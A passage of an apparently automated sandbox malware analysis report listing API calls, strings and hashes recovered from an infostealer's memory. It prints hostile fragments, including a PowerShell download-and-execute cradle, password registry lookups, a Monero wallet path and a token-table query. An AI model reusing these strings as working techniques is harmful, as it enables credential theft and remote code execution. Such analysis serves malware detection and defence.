                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: :
                                    • API String ID: 3191641157-3653984579
                                    • Opcode ID: 790f26c168defffd511cc9dc4b11457bffd804e4dfc006a33ef1da97a5dc08a1
                                    • Instruction ID: 9a7414f6a0021c2b2c111942619fcbd8bb9887b05a095d30081b5afb0d94ef20
                                    • Opcode Fuzzy Hash: 790f26c168defffd511cc9dc4b11457bffd804e4dfc006a33ef1da97a5dc08a1
                                    • Instruction Fuzzy Hash: C9315CB5901609DFCB06EBE4DC85DFE7778BB48302F148119F106A7291EA34A946CB61
                                    APIs
                                    • memset.MSVCRT ref: 000D7314
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000D733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000D73B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000D740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 000D7452
                                    • HeapFree.KERNEL32(00000000), ref: 000D7459
                                    • task.LIBCPMTD ref: 000D7555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: Password
                                    • API String ID: 2808661185-3434357891
                                    • Opcode ID: 806425b36b46f00a730345a0154f175edba2684e57c8556d7d3d42bcc5843e5e
                                    • Instruction ID: 948d76fe6688189c7698989f2d1feb21c3fa60377a79274ef653679f709f7e12
                                    • Opcode Fuzzy Hash: 806425b36b46f00a730345a0154f175edba2684e57c8556d7d3d42bcc5843e5e
                                    • Instruction Fuzzy Hash: AA611FB59042589BDB25DB50DC45BD977B8BF48300F00C1EAE64D66242EB705BC9CFA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00B7F268,00000000,?,000F0E2C,00000000,?,00000000), ref: 000E8130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E8137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 000E8158
                                    • __aulldiv.LIBCMT ref: 000E8172
                                    • __aulldiv.LIBCMT ref: 000E8180
                                    • wsprintfA.USER32 ref: 000E81AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    • Opcode ID: fb935023d97837c657a45a7df8aa0e4ab452778009fd05a786f202cfe672c48c
                                    • Instruction ID: f00cd0d9c10ae71a8a6e71d00064a02eb5b35e4dbe3fc167f448b71b37fe4325
                                    • Opcode Fuzzy Hash: fb935023d97837c657a45a7df8aa0e4ab452778009fd05a786f202cfe672c48c
                                    • Instruction Fuzzy Hash: 6421F9B1E44258AFDB10DFD5CC49FAEB7BCEB48B11F108619F605BB280D77859018BA5
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4839
                                      • Part of subcall function 000D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4849
                                    • InternetOpenA.WININET(000F0DF7,00000001,00000000,00000000,00000000), ref: 000D610F
                                    • StrCmpCA.SHLWAPI(?,00B81328), ref: 000D6147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 000D618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000D61B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 000D61DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000D620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 000D6249
                                    • InternetCloseHandle.WININET(?), ref: 000D6253
                                    • InternetCloseHandle.WININET(00000000), ref: 000D6260
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 57bab26e66969a797ab6ca10f6b3303e23d4c51a9d0abf07c26e7dc95371ddd6
                                    • Instruction ID: 72a098d35494b057e253be6cf4bfc3e8abe85c718739d2683862986c32c24810
                                    • Opcode Fuzzy Hash: 57bab26e66969a797ab6ca10f6b3303e23d4c51a9d0abf07c26e7dc95371ddd6
                                    • Instruction Fuzzy Hash: 1E5150B1A00718AFDB20DF90DC45BEE77B8EB48705F108099B605A72C1DB756A89CFA5
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                    • lstrlen.KERNEL32(00000000), ref: 000DBC9F
                                      • Part of subcall function 000E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 000DBCCD
                                    • lstrlen.KERNEL32(00000000), ref: 000DBDA5
                                    • lstrlen.KERNEL32(00000000), ref: 000DBDB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 22defcd8c2a162fc3de233913c8e73cd51f9a03b5ec6c4f497ac45a1de1a2dbd
                                    • Instruction ID: 13ba5b184f1864ba0a3ad858a2c3f27bcf5c2c7d89b06ea20434457f6ca41b37
                                    • Opcode Fuzzy Hash: 22defcd8c2a162fc3de233913c8e73cd51f9a03b5ec6c4f497ac45a1de1a2dbd
                                    • Instruction Fuzzy Hash: 5CB15E71A102489FDB14EBA1DD96EEE7339AF19300F414129F506B6193EF347A49CBA2
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 2321147e36b407dfa844ddeb11423d3c9dcad7c3ce238bd97d67cbf8300c5d92
                                    • Instruction ID: 18c8ae3b2ca7e3fb6b84b185366e6b157a14f7406965a51147c07522454091ac
                                    • Opcode Fuzzy Hash: 2321147e36b407dfa844ddeb11423d3c9dcad7c3ce238bd97d67cbf8300c5d92
                                    • Instruction Fuzzy Hash: 28F0E230909208EFD3429FE0E8097AC7BB8FB09713F048198F629962C0D6314B41CB92
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000D4FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000D4FD1
                                    • InternetOpenA.WININET(000F0DDF,00000000,00000000,00000000,00000000), ref: 000D4FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 000D5011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 000D5041
                                    • InternetCloseHandle.WININET(?), ref: 000D50B9
                                    • InternetCloseHandle.WININET(?), ref: 000D50C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: caaf3341e6298b2cd749c1721a985d27c139b0e922a9b29cdd212dd2cc534d76
                                    • Instruction ID: a056aef44277661365cb5b89fc59d95e985cd8b320b0853f19e97c1b4ccb8b8c
                                    • Opcode Fuzzy Hash: caaf3341e6298b2cd749c1721a985d27c139b0e922a9b29cdd212dd2cc534d76
                                    • Instruction Fuzzy Hash: 953119B4A00218ABDB20CF54DC85BDCB7B8EB48705F1081D9FB09A7281D7706EC58FA9
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000E8426
                                    • wsprintfA.USER32 ref: 000E8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 000E847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E8499
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,00B7EFC8,00000000,000F003F,?,00000400), ref: 000E84EC
                                    • lstrlen.KERNEL32(?), ref: 000E8501
                                    • RegQueryValueExA.ADVAPI32(00000000,00B7F040,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,000F0B34), ref: 000E8599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E8608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 290308db7c35f2600d789fef21000de99d378da8cdba8a5bdacb677fb63ff1dd
                                    • Instruction ID: ff7e14f79d32793d5504916c150847d3913c20d683220298087e73537a8d45bd
                                    • Opcode Fuzzy Hash: 290308db7c35f2600d789fef21000de99d378da8cdba8a5bdacb677fb63ff1dd
                                    • Instruction Fuzzy Hash: 702107B1A11218AFDB64DB54DC85FE9B7B8FB48701F00C199A609A6180DF716A85CFD4
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E76A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E76AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,00B6C658,00000000,00020119,00000000), ref: 000E76DD
                                    • RegQueryValueExA.ADVAPI32(00000000,00B7F190,00000000,00000000,?,000000FF), ref: 000E76FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E7708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 355de2c8b40d8ed3ac8d89723d19db495c20c1e61cc543f1a6be2e31a96134bc
                                    • Instruction ID: d71aea9f38869c32858a9d42fdbd04af38d82da8c4d624793455761e358a1b11
                                    • Opcode Fuzzy Hash: 355de2c8b40d8ed3ac8d89723d19db495c20c1e61cc543f1a6be2e31a96134bc
                                    • Instruction Fuzzy Hash: DE014FB5A09608BFD702DBE5DC49FFDB7BCEB4C702F108454FA04A7291E6749A008B51
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,00B6C658,00000000,00020119,000E76B9), ref: 000E775B
                                    • RegQueryValueExA.ADVAPI32(000E76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 000E777A
                                    • RegCloseKey.ADVAPI32(000E76B9), ref: 000E7784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 065deb102bb2942a3cfd14f2ac002657079d2b64b0bd649ed8596befd393d3d0
                                    • Instruction ID: ea61067c2971ffbed80730bcf6738c5b3957f9f655ec89db2f92ef40650ad5c1
                                    • Opcode Fuzzy Hash: 065deb102bb2942a3cfd14f2ac002657079d2b64b0bd649ed8596befd393d3d0
                                    • Instruction Fuzzy Hash: 0101E1B5A40208BBD701DBE4DC49FEEB7BCEB48701F108555FA15A6281D6745A008B52
                                    APIs
                                    • memset.MSVCRT ref: 000E40D5
                                    • RegOpenKeyExA.ADVAPI32(80000001,00B7FD40,00000000,00020119,?), ref: 000E40F4
                                    • RegQueryValueExA.ADVAPI32(?,00B80870,00000000,00000000,00000000,000000FF), ref: 000E4118
                                    • RegCloseKey.ADVAPI32(?), ref: 000E4122
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4147
                                    • lstrcat.KERNEL32(?,00B809F0), ref: 000E415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: 2c6b9161beca19f1c9fb5aed20a1de5d03fcde3731b3093057e07f5e2de5c6ee
                                    • Instruction ID: b37f3fe04991d17d9158194bcd14f3e8844336d07f46db10d60e038184b2d0cd
                                    • Opcode Fuzzy Hash: 2c6b9161beca19f1c9fb5aed20a1de5d03fcde3731b3093057e07f5e2de5c6ee
                                    • Instruction Fuzzy Hash: EA417BB6D00108ABDB15EBE0EC46FFD777DA78C300F408559B61557182EE755B888BA2
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                    • LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 70119b629513392fb3f52042c5664fd6a2c161a024d1101009910b73d6af1764
                                    • Instruction ID: 7deb1bf753477d181bd8f5e737d9617b375fe16709c30ec640008b5e3236897b
                                    • Opcode Fuzzy Hash: 70119b629513392fb3f52042c5664fd6a2c161a024d1101009910b73d6af1764
                                    • Instruction Fuzzy Hash: A031E5B5A00209EFDB14CF98C985BEE77F9BF48351F108159E911A7390D774AA41CFA2
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Typememset
                                    • String ID:
                                    • API String ID: 3530896902-3916222277
                                    • Opcode ID: e04d6137919512cefbe7e50e249a30663bddc54479348cf81725ed586df5eddb
                                    • Instruction ID: 035dbf4d9d8bd2f7309457ccdff1380730115b2cd60125e251e48a0406ccd822
                                    • Opcode Fuzzy Hash: e04d6137919512cefbe7e50e249a30663bddc54479348cf81725ed586df5eddb
                                    • Instruction Fuzzy Hash: 924107711007DC5EEB318B258D88FFBBBE89B45304F1444A9E9CAA6083D2729A459F20
                                    APIs
                                    • lstrcat.KERNEL32(?,00B808E8), ref: 000E47DB
                                      • Part of subcall function 000E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4801
                                    • lstrcat.KERNEL32(?,?), ref: 000E4820
                                    • lstrcat.KERNEL32(?,?), ref: 000E4834
                                    • lstrcat.KERNEL32(?,00B6B0F8), ref: 000E4847
                                    • lstrcat.KERNEL32(?,?), ref: 000E485B
                                    • lstrcat.KERNEL32(?,00B7FBC0), ref: 000E486F
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000E8D90: GetFileAttributesA.KERNEL32(00000000,?,000D1B54,?,?,000F564C,?,?,000F0E1F), ref: 000E8D9F
                                      • Part of subcall function 000E4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000E4580
                                      • Part of subcall function 000E4570: RtlAllocateHeap.NTDLL(00000000), ref: 000E4587
                                      • Part of subcall function 000E4570: wsprintfA.USER32 ref: 000E45A6
                                      • Part of subcall function 000E4570: FindFirstFileA.KERNEL32(?,?), ref: 000E45BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 2652f2a5a46a02dd81d55db7daed08c810d8be077e81d52f1292ed8503187dc7
                                    • Instruction ID: 50aa3e6150fbf7d200168bba7364e5fef4d5cb6e1fbcfc5b42f5db027275bb12
                                    • Opcode Fuzzy Hash: 2652f2a5a46a02dd81d55db7daed08c810d8be077e81d52f1292ed8503187dc7
                                    • Instruction Fuzzy Hash: 4B3166B6D00218ABCB11F7B0DC85EED737CAB58701F448589F359A6082EE749789CB95
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000E2D85
                                    Strings
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 000E2CC4
                                    • <, xrefs: 000E2D39
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 000E2D04
                                    • ')", xrefs: 000E2CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
